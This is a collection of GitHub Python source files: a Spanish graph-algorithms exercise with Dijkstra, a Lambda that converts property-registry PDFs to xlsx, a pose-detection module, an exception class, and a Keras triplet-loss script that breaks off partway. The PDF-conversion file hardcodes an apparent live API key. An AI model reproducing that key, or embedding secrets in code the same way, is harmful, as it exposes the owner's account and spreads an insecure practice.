arcos: Arco\n for arcos in conjunto:\n if verticeFinal == arcos.verticeFinal:\n return True\n \n def eliminarArco(self, verticeInicial, verticeFinal, peso: int):\n if not self.buscarArcoConPeso(verticeInicial, verticeFinal, peso):\n return None\n arcoTemporal = Arco(verticeInicial, verticeFinal, peso)\n conjunto: set = self.__listaVertices[verticeInicial]\n conjunto.remove(arcoTemporal)\n return True\n \n def eliminarVertice(self, verticeEliminar):\n listaTemporal = []\n for vertices in self.verVertices():\n arco: Arco\n conjunto: set = self.__listaVertices[vertices]\n for arco in conjunto:\n if arco.verticeFinal == verticeEliminar:\n listaTemporal.append(arco)\n arco: Arco\n for arco in listaTemporal:\n verticeInicial = arco.verticeInicial\n verticeFinal = arco.verticeFinal\n peso = arco.peso\n self.eliminarArco(verticeInicial, verticeFinal, peso)\n self.__listaVertices.pop(verticeEliminar)\n return True\n \n def listaArcos(self):\n listaArcos = []\n for vertices in self.verVertices():\n for arcos in self.buscarVertice(vertices):\n listaArcos.append(arcos)\n return listaArcos\n \n def contarArcos(self):\n return len(self.listaArcos())\n \n def sonAdyacentes(self, verticeInicial, verticeFinal):\n if self.existenAmbosVertices(verticeInicial, verticeFinal):\n return self.buscarArcoSinPeso(verticeInicial, verticeFinal)\n\n def verAdyacentesVertice(self, verticeBuscar):\n if self.buscarVertice(verticeBuscar) is None:\n return \"No existe\"\n return self.buscarVertice(verticeBuscar)\n \n def contarAdyacentesVertice(self, verticeBuscar):\n if self.buscarVertice(verticeBuscar) is None:\n return None\n return len(self.__listaVertices.get(verticeBuscar))\n \n def verAdyacentesTodos(self):\n cadena = \"\"\n for vertice in self.__listaVertices:\n for elementoConjunto in self.__listaVertices[vertice]:\n cadena = cadena + str(elementoConjunto) + \"%\"\n cadena = cadena.split(\"%\")\n cadena.remove(\"\")\n if len(cadena) == 0:\n return {}\n cadena = set(cadena)\n return cadena\n \n def contarAdyacentesTodos(self):\n cont = 0\n for vertice in self.__listaVertices:\n for _ in self.__listaVertices[vertice]:\n cont = cont + 1\n return cont\n \n def dirigidosConPeso(self, verticeInical, verticeFinal, peso: int):\n if self.buscarArcoConPeso(verticeInical, verticeFinal, peso) and self.buscarArcoConPeso(verticeFinal, verticeInical, peso):\n return True\n \n def dirigidosSinPeso(self, verticeInical, verticeFinal):\n if self.buscarArcoSinPeso(verticeInical, verticeFinal) and self.buscarArcoSinPeso(verticeFinal, verticeInical):\n return True\n \n def noDirigidosConPeso(self, verticeInical, verticeFinal, peso: int):\n if (self.buscarArcoConPeso(verticeInical, verticeFinal, peso) or self.buscarArcoConPeso(verticeFinal, verticeInical, peso)) and \\\n not self.dirigidosConPeso(verticeInical, verticeFinal, peso):\n return True\n \n def noDirigidosSinPeso(self, verticeInical, verticeFinal):\n if (self.buscarArcoSinPeso(verticeInical, verticeFinal) or self.buscarArcoSinPeso(verticeFinal, verticeInical)) and \\\n not self.dirigidosSinPeso(verticeInical, verticeFinal):\n return True\n \n def __dfs(self, listaRecorrido: list, setVisitados: set, verticeActual):\n listaRecorrido.append(verticeActual)\n setVisitados.add(verticeActual)\n arcoActual: Arco\n adyacentes = self.buscarVertice(verticeActual)\n for arcoActual in adyacentes:\n verticeFinal = arcoActual.verticeFinal\n if verticeFinal not in setVisitados:\n listaRecorrido, setVisitados = self.__dfs(listaRecorrido, setVisitados, verticeFinal)\n return listaRecorrido, 
setVisitados\n \n def recorrerProfundidad(self, verticeInicial): \n if self.buscarVertice(verticeInicial) is None:\n return None \n recorrido, visitados = self.__dfs(list(), set(), verticeInicial)\n for vertice in self.verVertices():\n if vertice not in visitados:\n recorrido, visitados = self.__dfs(recorrido, visitados, vertice)\n return recorrido\n \n def __bfs(self, listaRecorrido: list, setVisitados: set, verticeActual):\n listaRecorrido.append(verticeActual)\n setVisitados.add(verticeActual)\n colaAdyacente = [verticeActual]\n while colaAdyacente:\n arcoActual: Arco\n verticeCola = colaAdyacente.pop(0) \n adyacentesActual = self.buscarVertice(verticeCola)\n for arcoActual in adyacentesActual:\n verticeFinal = arcoActual.verticeFinal\n if verticeFinal not in setVisitados:\n listaRecorrido.append(verticeFinal)\n setVisitados.add(verticeFinal)\n colaAdyacente.append(verticeFinal)\n return listaRecorrido, setVisitados\n \n def recorrerAnchura(self, verticeInicial):\n if self.buscarVertice(verticeInicial) is None:\n return None \n recorrido, visitados = self.__bfs(list(), set(), verticeInicial)\n for vertice in self.verVertices():\n if vertice not in visitados:\n recorrido, visitados = self.__bfs(recorrido, visitados, vertice)\n return recorrido\n\n def gradoSalidaVertice(self, verticeBuscar):\n if self.buscarVertice(verticeBuscar) is None:\n return None\n conjunto = self.buscarVertice(verticeBuscar)\n return len(conjunto)\n \n def gradoEntradaVertice(self, verticeBuscar):\n if self.buscarVertice(verticeBuscar) is None:\n return None\n cont = 0\n for vertices in self.verVertices():\n if self.verAdyacentesVertice(vertices) is None:\n continue\n arco: Arco\n for arco in self.verAdyacentesVertice(vertices):\n verticeFinal = arco.verticeFinal\n if verticeBuscar == verticeFinal:\n cont = cont + 1\n return cont\n \n def imprimirDatos(self):\n print(f\"Lista: {self}\")\n print(f\"Contar vértices: {self.contarVertices()}\")\n print(f\"Ver vértices: {self.verVertices()}\")\n print(f\"Contar arcos: {self.contarArcos()}\")\n print(f\"Ver arcos: {self.listaArcos()}\")\n print(f\"Contar adyacentes: {self.contarAdyacentesTodos()}\")\n print(f\"Ver adyacentes: {self.verAdyacentesTodos()}\\n\")\n \n def grafoDirigido(self):\n lista = []\n arco: Arco\n for arco in self.listaArcos():\n q = arco.verticeInicial\n w = arco.verticeFinal\n r = arco.peso\n arcoInvertido = Arco(w, q, r)\n if arcoInvertido not in self.listaArcos():\n return True\n return False\n\n def grafoNoDirigido(self):\n return not self.grafoDirigido()\n \n def __dfsConexo(self, inicio, arcosVisitados=None):\n if arcosVisitados is None:\n arcosVisitados = set()\n visitados = {inicio}\n stack = [inicio]\n while stack:\n vertice = stack.pop()\n vecino: Arco\n for vecino in self.__listaVertices[vertice]:\n if (vertice, vecino) not in arcosVisitados:\n visitados.add(vecino.verticeFinal)\n arcosVisitados.add((vertice, vecino))\n stack.append(vecino.verticeFinal)\n return visitados\n\n def grafoConexo(self):\n lista = []\n arcosVisitados = set()\n for inicio in self.__listaVertices:\n visitadosInicio = self.__dfsConexo(inicio, arcosVisitados)\n lista.append(visitadosInicio)\n if len(visitadosInicio) == len(self.__listaVertices):\n arcosVisitados = set()\n continue\n else:\n return False\n return True\n \n # 1. 
Determinar si existe un camino válido entre dos vértices\n    def caminoEntreDosVertices(self, inicio, fin):\n        if not self.existenAmbosVertices(inicio, fin):\n            return None\n        pila = [(inicio, [])]\n        visitados = set()\n        while pila:\n            vertice, arcosVisitados = pila.pop()\n            if vertice == fin:\n                return True\n            if vertice not in visitados:\n                visitados.add(vertice)\n                arco: Arco\n                for arco in self.__listaVertices[vertice]:\n                    if arco.verticeFinal not in visitados:\n                        pila.append((arco.verticeFinal, arcosVisitados + [arco]))\n        return False\n    \n    # 2. Determinar si el grafo tiene, al menos un ciclo\n    def __dfsUnCicloSimple(self, vertice, visitados:set, explorados=None, padre=None):\n        if explorados is None:\n            explorados = set()\n        visitados.add(vertice)\n        explorados.add(vertice)\n        w: Arco \n        for w in self.__listaVertices[vertice]:\n            if w.verticeFinal in explorados and w.verticeFinal != padre:\n                return True\n            elif w.verticeFinal not in visitados:\n                if self.__dfsUnCicloSimple(w.verticeFinal, visitados, explorados, vertice):\n                    return True\n        explorados.remove(vertice)\n        return False\n\n    def alMenosUnCicloSimple(self):\n        visitados = set()\n        for vertice in self.__listaVertices:\n            if vertice not in visitados:\n                if self.__dfsUnCicloSimple(vertice, visitados):\n                    return True\n        return False\n    \n    # 3. Determinar si el grafo es fuertemente conexo\n    def grafoFuertementeConexo(self):\n        if not self.grafoDirigido():\n            return False\n        return self.grafoConexo()\n    \n    # 4. Determinar si el grafo es completo\n    def grafoCompleto(self):\n        if not self.grafoNoDirigido():\n            return False\n        for verticeInicial in self.verVertices():\n            for verticeFinal in self.verVertices():\n                if verticeInicial == verticeFinal:\n                    continue\n                if self.sonAdyacentes(verticeInicial, verticeFinal) or self.sonAdyacentes(verticeFinal, verticeInicial):\n                    continue\n                else:\n                    return False\n        return True\n\n\nclass Dijkstra:\n    def __init__(self, grafo: ListaAdyacencia, verticeInical) -> None:\n        self.__verticesUbicados = set()\n        self.__verticesSinUbicar = set()\n        self.__distancia = dict()\n        self.__predecesores = dict()\n        self.__verticeInicial = verticeInical\n        self.__grafo = grafo\n\n    def __calcularDistanciaMasCorta(self, vertice):\n        distanciaVertice = self.__distancia.get(vertice)\n        if distanciaVertice is None:\n            return sys.maxsize\n        else:\n            return distanciaVertice\n    \n    def __buscarMinimo(self, vertices):\n        verticeMinimo = None\n        for verticeActual in vertices:\n            if verticeMinimo is None:\n                verticeMinimo = verticeActual\n            else:\n                if self.__calcularDistanciaMasCorta(verticeActual) < self.__calcularDistanciaMasCorta(verticeMinimo):\n                    verticeMinimo = verticeActual\n        return verticeMinimo\n    \n    def __buscarDistanciasMinimas(self, vertice):\n        arco: Arco\n        adyacentes = self.__grafo.buscarVertice(vertice)\n        for arco in adyacentes:\n            verticeAdyacente = arco.verticeFinal\n            if self.__calcularDistanciaMasCorta(verticeAdyacente) > self.__calcularDistanciaMasCorta(vertice) + arco.peso:\n                self.__distancia[verticeAdyacente] = self.__calcularDistanciaMasCorta(vertice) + arco.peso\n                self.__predecesores[verticeAdyacente] = vertice\n                self.__verticesSinUbicar.add(verticeAdyacente)\n    \n    def inicializarDijikstra(self):\n        self.__distancia[self.__verticeInicial] = 0\n        self.__verticesSinUbicar.add(self.__verticeInicial)\n        while self.__verticesSinUbicar:\n            mejorVertice = self.__buscarMinimo(self.__verticesSinUbicar)\n            self.__verticesUbicados.add(mejorVertice)\n            self.__verticesSinUbicar.remove(mejorVertice)\n            self.__buscarDistanciasMinimas(mejorVertice)\n\n    def obtenerCamino(self, 
verticeFinal):\n caminoEncontrado = []\n verticeActual = verticeFinal\n if self.__predecesores.get(verticeActual) is None:\n return None\n caminoEncontrado.append(verticeActual)\n while self.__predecesores.get(verticeActual):\n verticeActual = self.__predecesores[verticeActual]\n caminoEncontrado.append(verticeActual)\n caminoEncontrado.reverse()\n return caminoEncontrado\n\n# - - - - - Prueba - - - - -\n\nlista_01 = ListaAdyacencia() # Dirigido + no conexo\nlista_01.adicionarVertice(\"A\")\nlista_01.adicionarVertice(\"B\")\nlista_01.adicionarVertice(\"C\")\nlista_01.adicionarVertice(\"D\")\nlista_01.adicionarArco(\"A\", \"B\", 2)\nlista_01.adicionarArco(\"B\", \"C\", 3)\nlista_01.adicionarArco(\"C\", \"D\", 2)\nlista_01.adicionarArco(\"D\", \"B\", 1)\n\nprint(f\"Grafo 01: {lista_01}\")\nprint(f\"¿Hay un camino de 'A' a 'D'?: {lista_01.caminoEntreDosVertices('A', 'D')}\")\nprint(f\"¿Hay al menos un ciclo simple?: {lista_01.alMenosUnCicloSimple()}\")\nprint(f\"¿Es fuertemente conexo?: {lista_01.grafoFuertementeConexo()}\")\nprint(f\"¿Es completo?: {lista_01.grafoCompleto()}\\n\")\n\nlista_02 = ListaAdyacencia() # No dirigido + conexo\nlista_02.adicionarVertice(\"A\")\nlista_02.adicionarVertice(\"B\")\nlista_02.adicionarVertice(\"C\")\nlista_02.adicionarVertice(\"D\")\nlista_02.adicionarArco(\"A\", \"B\", 2)\nlista_02.adicionarArco(\"B\", \"A\", 2)\nlista_02.adicionarArco(\"A\", \"C\", 2)\nlista_02.adicionarArco(\"C\", \"A\", 2)\nlista_02.adicionarArco(\"A\", \"D\", 2)\nlista_02.adicionarArco(\"D\", \"A\", 2)\nlista_02.adicionarArco(\"B\", \"C\", 2)\nlista_02.adicionarArco(\"C\", \"B\", 2)\nlista_02.adicionarArco(\"B\", \"D\", 2)\nlista_02.adicionarArco(\"D\", \"B\", 2)\nlista_02.adicionarArco(\"C\", \"D\", 2)\nlista_02.adicionarArco(\"D\", \"C\", 2)\n\nprint(f\"Grafo 02: {lista_02}\")\nprint(f\"¿Hay un camino de 'D' a 'B'?: {lista_02.caminoEntreDosVertices('D', 'B')}\")\nprint(f\"¿Hay al menos un ciclo simple?: {lista_02.alMenosUnCicloSimple()}\")\nprint(f\"¿Es fuertemente conexo?: {lista_02.grafoFuertementeConexo()}\")\nprint(f\"¿Es completo?: {lista_02.grafoCompleto()}\\n\")\n\nlista_03 = ListaAdyacencia() # Dirigido + conexo\nlista_03.adicionarVertice(\"A\")\nlista_03.adicionarVertice(\"B\")\nlista_03.adicionarVertice(\"C\")\nlista_03.adicionarVertice(\"D\")\nlista_03.adicionarVertice(\"E\")\n\nlista_03.adicionarArco(\"A\", \"B\", 2)\nlista_03.adicionarArco(\"B\", \"C\", 3)\nlista_03.adicionarArco(\"B\", \"E\", 2)\nlista_03.adicionarArco(\"C\", \"D\", 4)\nlista_03.adicionarArco(\"D\", \"A\", 1)\nlista_03.adicionarArco(\"E\", \"D\", 3)\n\nprint(f\"Grafo 03: {lista_03}\")\nprint(f\"¿Hay un camino de 'D' a 'E'?: {lista_03.caminoEntreDosVertices('D', 'E')}\")\nprint(f\"¿Hay al menos un ciclo simple?: {lista_03.alMenosUnCicloSimple()}\")\nprint(f\"¿Es fuertemente conexo?: {lista_03.grafoFuertementeConexo()}\")\nprint(f\"¿Es completo?: {lista_03.grafoCompleto()}\")\n","repo_name":"jesusdominguez2004/pruebas","sub_path":"algoritmos-2/semana-09/taller02.py","file_name":"taller02.py","file_ext":"py","file_size_in_byte":18302,"program_lang":"python","lang":"es","doc_type":"code","stars":4,"dataset":"github-code","pt":"50"} +{"seq_id":"19094632739","text":"import io\nimport base64\nimport json\nfrom time import sleep\nimport csv\nfrom itertools import chain\n\nimport requests\nimport pandas\n\nFILE_UPLOAD_HTML = \"\"\"\nConvert PDF to .xlsx\n
\n
\n Select image to upload:\n \n \n
\n\"\"\"\n\nSTART_CONVERSION_URL = \"http://api.convertio.co/convert\"\nAPI_KEY = \"608745a3c9efe0236d0369f591d304ee\"\nGET_CONVERSION_STATUS_URL = \"https://api.convertio.co/convert/{id}/status\"\nGET_CONVERTED_FILE_URL = \"https://api.convertio.co/convert/{id}/dl\"\nSLEEP_TIME = 10\n\nlevel_1_destination_delimiter = '^level_1^'\nlevel_2_destination_delimiter = '^level_2^'\nto_replace = {\"Актуальна інформація про об’єкт нерухомого майна\": level_1_destination_delimiter,\n \"ВІДОМОСТІ ПРО ОБ’ЄКТ НЕРУХОМОГО МАЙНА\": level_1_destination_delimiter,\n \"Відомості про права власності\": level_2_destination_delimiter,\n \"ВІДОМОСТІ ПРО ПРАВА ВЛАСНОСТІ\": level_2_destination_delimiter,\n \"Дата внесення запису\": level_2_destination_delimiter + \"Дата внесення запису\",\n chr(12): \"\"\n }\n\nmain_info_starts = [\"Реєстраційний номер\", ]\nown_info_starts = [\"Дата внесення запису\", \"Номер запису про право власності / довірчої власності\"]\nskippers = ['стор.', 'RRP-', 'ВІДОМОСТІ', \"З РЕЄСТРУ ПРАВ ВЛАСНОСТІ НА НЕРУХОМЕ МАЙНО\"]\n\nkey_substitution = {\"Реєстраційний номер об’єкта нерухомого майна:\": \"Реєстраційний номер майна:\",\n \"Об’єкт нерухомого майна:\": \"Тип майна:\",\n \"Загальна площа (кв.м):\": \"Площа:\",\n \"Адреса нерухомого майна:\": \"Адреса:\"\n }\n\ncsv_keys = list(key_substitution.values())\ncsv_keys.append(\"Власники\")\n\n\ndef pdf2txt(file_content):\n # file_content = base64.b64encode(file_content).decode('utf-8')\n result = requests.post(url=START_CONVERSION_URL,\n data=json.dumps({\"apikey\": API_KEY, \"input\": \"base64\", \"file\": file_content,\n \"filename\": \"in.pdf\", \"outputformat\": \"file_content\"}))\n\n if result.status_code != 200:\n raise Exception(result.text)\n\n data = result.json()['data']\n id = data['id']\n print(f\"Start conversion response: {data}\")\n\n while True:\n print(f\"Start sleeping for {SLEEP_TIME} seconds\")\n sleep(SLEEP_TIME)\n\n result = requests.get(url=GET_CONVERSION_STATUS_URL.format(id=id))\n if result.status_code != 200:\n raise Exception(result.text)\n\n data = result.json()['data']\n print(f\"Conversion status response: {data}\")\n\n if data['step'] == 'finish':\n break\n\n result = requests.get(url=GET_CONVERTED_FILE_URL.format(id=id))\n if result.status_code != 200:\n raise Exception(result.text)\n\n data = result.json()['data']\n if data.get('error'):\n print(f\"Conversion error: {data.get('error')}\")\n raise Exception(data.get('error'))\n\n return base64.b64decode(data['content']).decode('utf-8')\n\n\ndef txt2dict(file_content: str):\n def _cut_starts(data, templates):\n for template in templates:\n if template in data:\n return data[data.index(template):]\n return data\n\n def _skip_unneeded_items(record, unneeded_items):\n result_record = []\n for line in record:\n\n new_line = []\n for block in line:\n skip_block = any(filter(lambda x: (x in block) or (not block.strip()), unneeded_items))\n if skip_block:\n continue\n new_line.append(block)\n\n result_record.append(new_line)\n\n return result_record\n\n def _cleanup_record(record):\n result_record = []\n for line in record:\n new_line = [block for block in line if block.strip()]\n if new_line:\n result_record.append(new_line)\n\n return result_record\n\n def _build_dict_record(record):\n main_info_block = record[0]\n\n key_parts = [item[:item.index(':') + 1].strip() if ':' in item else item[:25].strip() for item in\n main_info_block]\n value_parts = [item[item.index(':') + 1:].strip() if ':' in item else item[25:].strip() for item in\n main_info_block]\n\n 
key_index = 0\n key = ''\n keys = []\n for key_part in key_parts:\n key_index += 1\n key += key_part + ' '\n if ':' in key_part:\n keys.append((key.strip(), key_index))\n key = ''\n key_index = 0\n\n if key:\n keys.append((key.strip(), key_index))\n\n fixed_keys = []\n\n offset = 0\n for index in range(len(keys) - 1, -1, -1):\n if not keys[index][0]:\n offset += 1\n else:\n fixed_keys.append((keys[index][0], keys[index][1] + offset))\n offset = 0\n\n record[0] = {}\n\n index = 0\n fixed_keys.reverse()\n for key, cnt in fixed_keys:\n record[0][key] = ' '.join(value_parts[index:index + cnt])\n index += cnt\n\n return record\n\n def _build_dict_records(records):\n return [_build_dict_record(record) for record in records]\n\n for from_what, to_what in to_replace.items():\n file_content = file_content.replace(from_what, to_what)\n\n file_content = file_content.split(level_1_destination_delimiter)[1:]\n\n records = []\n\n for block in file_content:\n data = block.split(level_2_destination_delimiter)\n\n record = [_cut_starts(data[0], main_info_starts).split('\\n'),\n *[_cut_starts(owner, own_info_starts).split('\\n') for owner in data[1:]]]\n\n record = _skip_unneeded_items(record, skippers)\n record = _cleanup_record(record)\n if record:\n records.append(record)\n\n records = _build_dict_records(records)\n\n for record in records:\n record[0] = {key_substitution.get(key, key): value for key, value in record[0].items()}\n record[0]['Власники'] = chr(10).join(chain(*record[1:]))\n del record[1]\n\n return [record[0] for record in records]\n\n\ndef dict2csv(data):\n result_string = io.StringIO('')\n writer = csv.DictWriter(result_string, fieldnames=csv_keys, quoting=csv.QUOTE_ALL)\n writer.writerows(data)\n\n result_string.seek(0)\n return result_string.read()\n\n\ndef dict2xlsx(data):\n df = pandas.DataFrame(data)\n result_stringresult = io.BytesIO()\n df.to_excel(result_stringresult)\n return result_stringresult\n\n\ndef pdf2xlsx(pdf_data):\n data = txt2dict(pdf2txt(pdf_data))\n return dict2xlsx(data)\n\n\ndef lambda_handler(event, context):\n method = event['requestContext']['http']['method']\n if method == 'GET':\n return {\n 'statusCode': 200,\n 'headers': {'content-type': 'text/html'},\n 'body': FILE_UPLOAD_HTML\n }\n elif method == 'POST':\n return {\n 'statusCode': 200,\n 'headers': {'content-type': 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'},\n 'body': pdf2xlsx(event['requestContext']['body'])\n }\n\n return {\n 'statusCode': 400,\n 'content-type': 'text/html',\n 'body': f\"Unsupported HTTP method {method}. 
Correct are: GET, POST\"\n }\n","repo_name":"TarasTG/PythonGarbage","sub_path":"app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"10673348289","text":"import cv2\nimport mediapipe as mp\nimport numpy as np\nimport csv\nimport warnings\nwarnings.filterwarnings(\"ignore\")\nimport os \nimport sys\nsys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\ndef joint_extraction(results):\n joint_dict = {}\n for i, landmark in enumerate(results.pose_landmarks.landmark):\n joint_dict[f'Joint {i}'] = {'X': landmark.x, 'Y': landmark.y, 'Z': landmark.z}\n return joint_dict\n\nclass pose_detection:\n def __init__(self):\n # Initialize mediapipe pose solution\n self.mp_pose = mp.solutions.pose\n self.mp_draw = mp.solutions.drawing_utils\n self.pose = self.mp_pose.Pose()\n\n def pose_estimation(self, image_path: str, pose_show=True, extracted_pose=True,\n return_joints=True, save_csv=True):\n # Read the image\n img = cv2.imread(image_path)\n # Resize the image for better processing (optional)\n img = cv2.resize(img, (600, 400))\n\n # Perform pose detection\n self.results = self.pose.process(img)\n\n if self.results is None:\n print(\"Pose detection failed.\")\n return None\n if self.results.pose_landmarks is None:\n print(\"Pose detection failed or no landmarks detected.\")\n return None\n\n\n # Create a blank image with white background\n h, w, c = img.shape\n opimg = np.zeros([h, w, c], dtype=np.uint8)\n opimg.fill(255)\n\n # Draw the extracted pose on the blank image\n self.mp_draw.draw_landmarks(opimg, self.results.pose_landmarks, self.mp_pose.POSE_CONNECTIONS,\n self.mp_draw.DrawingSpec((255, 0, 0), 2, 2),\n self.mp_draw.DrawingSpec((255, 0, 255), 2, 2))\n if pose_show:\n # Display the original image with pose estimation\n cv2.imshow(\"Pose Estimation\", img)\n\n if extracted_pose:\n # Display the extracted pose on a blank image\n cv2.imshow(\"Extracted Pose\", opimg)\n\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n if return_joints:\n # Extract joint locations\n joint_locations = []\n for landmark in self.results.pose_landmarks.landmark:\n joint_locations.append((landmark.x, landmark.y, landmark.z))\n if save_csv:\n # Save the joint positions and other details to a CSV file\n csv_file = \"pose_details.csv\"\n with open(csv_file, mode='w', newline='') as file:\n writer = csv.writer(file)\n writer.writerow([\"Joint\", \"X\", \"Y\", \"Z\"]) # Header row\n for i, joint in enumerate(joint_locations):\n writer.writerow([f\"Joint {i}\", joint[0], joint[1], joint[2]])\n return joint_extraction(self.results)\n else:\n return None\n","repo_name":"shiv2398/Body_measurments_using_Pose-Detection","sub_path":"pose_detection_model/pose_detetion.py","file_name":"pose_detetion.py","file_ext":"py","file_size_in_byte":2913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"70505942875","text":"\"\"\"Module for Custom_Error exception\"\"\"\n\nfrom typing import Literal\n\n\nclass Custom_Error(Exception):\n \"\"\"Implement custom exceptions with this class\"\"\"\n\n def __init__(self, message: str, cause: Literal[\"Authentication\", \"Database\"], status_code: int, **kwargs) -> None:\n self.message = message\n self.cause = cause\n self.status_code = status_code\n self.__dict__.update(kwargs)\n self.formated = dict(message=message, cause=cause, **kwargs), status_code\n super().__init__(self.__dict__)\n\n 
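# Hypothetical usage sketch (illustration only, not part of the original file):\n    #   raise Custom_Error(\"Invalid token\", cause=\"Authentication\", status_code=401)\n    # a handler can then return the prebuilt (body, status_code) pair in .formated.\n    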
def __repr__(self):\n return f\"<{type(self)} message={self.message} cause={self.cause}>\"\n","repo_name":"Juli03b/groupypay","sub_path":"exceptions/Custom_Error.py","file_name":"Custom_Error.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"3187637735","text":"from keras.applications.vgg16 import VGG16\n# from keras.applications.vgg16 import preprocess_input\nfrom keras.applications.inception_v3 import InceptionV3\nfrom keras.preprocessing import image\nfrom keras.models import Model\nfrom keras.layers import Input, merge, Flatten, Embedding, Dense, GlobalAveragePooling2D, Lambda\nfrom keras import backend as K\n# import keras\nfrom keras.models import load_model\nimport random\n# import keras.backend.tensorflow_backend as KTF\n\nimport numpy as np\nfrom glob import glob\nimport os\nimport sys\nimport time\n\n# import pandas as pd\nimport logging\n\nimport matplotlib as mpl\nmpl.use('Agg')\nimport matplotlib.pyplot as plt\nimport json\n\n\n# argv[]\n# argv[1] : input directory for test_anchor\n# argv[2] : input directory for test_positive\n# argv[3] : epoch_num(max)\n# argv[4] : model(.hd5) directory\n\ndef identity_loss(y_true, y_pred):\n return K.mean(y_pred - 0 * y_true)\n\ndef visualize_vec(vec):\n anchor, positive, negative = vec\n print(\"anchor = {}\".format(anchor))\n # この下にt-sneを書いていきたい\n\ndef triplet_loss(vec, alpha = 0.2):\n visualize_vec(vec)\n\n anchor, positive, negative = vec\n d_p = K.sum(K.square(anchor - positive), axis = -1)\n d_n = K.sum(K.square(anchor - negative), axis = -1)\n loss = K.mean(K.maximum(0.0, d_p -d_n + alpha ))\n return loss\n\ndef top5(rank_dist, rank_index, new, index, filename, top5name):\n for i, dist in enumerate(rank_dist):\n if float(new) < dist:\n for frame in rank_index:\n if index in range(frame-30, frame+30):\n return rank_dist, rank_index, top5name\n\n rank_dist.insert(i, float(new))\n rank_dist.pop(5)\n rank_index.insert(i, index)\n rank_index.pop(5)\n top5name.insert(i, os.path.abspath(filename))\n top5name.pop(5)\n\n return rank_dist, rank_index, top5name\n\n return rank_dist, rank_index, top5name\n\n\ndef top20(rank_dist, rank_index, new, index, filename, top5name):\n for i, dist in enumerate(rank_dist):\n if float(new) < dist:\n for frame in rank_index:\n if index in range(frame-20, frame+20):\n return rank_dist, rank_index, top5name\n\n rank_dist.insert(i, float(new))\n rank_dist.pop(20)\n rank_index.insert(i, index)\n rank_index.pop(20)\n top5name.insert(i, os.path.abspath(filename))\n top5name.pop(20)\n\n return rank_dist, rank_index, top5name\n\n return rank_dist, rank_index, top5name\n\n\ndef top500(rank_dist, rank_index, new, index):\n for i, score in enumerate(rank_dist):\n if float(new) < score:\n rank_dist.insert(i, float(new))\n rank_dist.pop(500)\n rank_index.insert(i, index)\n rank_index.pop(500)\n\n return rank_dist, rank_index\n\n return rank_dist, rank_index\n\ndef confidence_graph(confidences, order_num):\n fig = plt.figure(figsize=(200, 10))\n plt.xlabel(\"frame\")\n plt.ylabel(\"confidence\")\n plt.rcParams[\"font.size\"] = 16\n # plt.legend([\"confidence\"], loc= loc=\"upper right\")\n\n frames = range(len(confidences))\n num = 100 #移動平均の個数\n b = np.ones(int(num))/num\n ido = np.convolve(confidences, b, mode='same')#移動平均\n\n plt.xlim(0, len(confidences))\n plt.ylim(0.5, 1.0)\n\n plt.plot(frames, confidences, \"r\",linewidth=1, linestyle=\"-\", label=\"conf\")\n plt.plot(frames, ido, \"b\",linewidth=10, 
linestyle=\"-\", label=\"moving average (n = {})\".format(int(num)))\n plt.legend(fontsize=18)\n\n plt.savefig(\"confidence_order{}.pdf\".format(order_num),bbox_inches=\"tight\")\n\n\ndef create_base_network(model_name):\n model_name = 'inception'\n if model_name == 'vgg16':\n vgg_model = VGG16(include_top=False, weights='imagenet')\n model = Model(input = vgg_model.input, output = vgg_model.output)\n elif model_name == 'inception':\n inception_model = InceptionV3(weights='imagenet', include_top=False)\n x = inception_model.get_layer('mixed5').output\n x = GlobalAveragePooling2D()(x)\n\n\n x = Dense(1024, activation='relu')(x)\n x = Dense(128)(x)\n model = Model(input = inception_model.input, output = x)\n return model\n\ndef triplet_output_shape(shapes):\n shape1, shape2, shape3 = shapes\n return (shape1[0], 1)\n\ndef build(base_model, input_shape=(224, 224,3)):\n anchor = Input(shape=input_shape, name='input_anchor')\n positive = Input(shape=input_shape, name='input_positive')\n negative = Input(shape=input_shape, name='input_negative')\n out_a = base_model(anchor)\n out_p = base_model(positive)\n out_n = base_model(negative)\n\n loss = Lambda(triplet_loss,\n output_shape=triplet_output_shape,\n name='triplet_loss')([out_a, out_p, out_n])\n\n return Model(input=[anchor, positive, negative], output=loss)\n\ndef build_predict(base_model, input_shape=(224, 224,3)):\n input_img = Input(shape=input_shape)\n out = base_model(input_img)\n return Model(input=input_img, output=out)\n\ndef get_img(name):\n img = image.load_img(name, target_size=(224, 224))\n x = image.img_to_array(img)\n return x\n\ndef test():\n # ログの出力名を設定(1)\n logger = logging.getLogger('LoggingTest')\n\n # ログレベルの設定(2)\n logger.setLevel(20)\n # ログレベル以下のログは標準出力に表示されない\n # NOTSET\t0\t設定値などの記録(全ての記録)\n # DEBUG\t10\t動作確認などデバッグの記録\n # INFO\t20\t正常動作の記録\n # WARNING\t30\tログの定義名\n # ERROR\t40\tエラーなど重大な問題\n # CRITICAL\t50\t停止など致命的な問題\n\n # ログのファイル出力先を設定(3)\n now = time.ctime()\n parsed = time.strptime(now)\n fh = logging.FileHandler('output_value2_{}.log'.format(time.strftime(\"%Y%m%d_%H:%M:%S\", parsed)))\n logger.addHandler(fh)\n\n # ログのコンソール出力の設定(4)\n sh = logging.StreamHandler()\n logger.addHandler(sh)\n\n model_name = 'inception'\n base_model = create_base_network(model_name)\n if K.image_data_format() == 'channels_first':\n input_shape = (3, 224, 224)\n else:\n input_shape = (224, 224, 3)\n model = build_predict(base_model, input_shape=input_shape)\n model.summary()\n\n # glob対象が複数の場合はこっち\n # dlist_v1 = glob(os.path.join(sys.argv[1], '*'))\n # dlist_v2 = glob(os.path.join(sys.argv[2], '*'))\n\n # glob対象が単一ディレクトリの場合はこっち\n dlist_v1 = []\n dlist_v2 = []\n dlist_v1.append(sys.argv[1])\n dlist_v2.append(sys.argv[2])\n\n dlist_v1.sort()\n dlist_v2.sort()\n\n key_indexs = []\n top5Corrects = []\n allepoch_top5filenames = []\n\n # 全部のepochいじるときはfor文を有効に\n for epoch in range(int(sys.argv[3])):\n epoch = str(epoch+1).zfill(2)\n logger.log(30, 'epoch {}'.format(epoch))\n\n 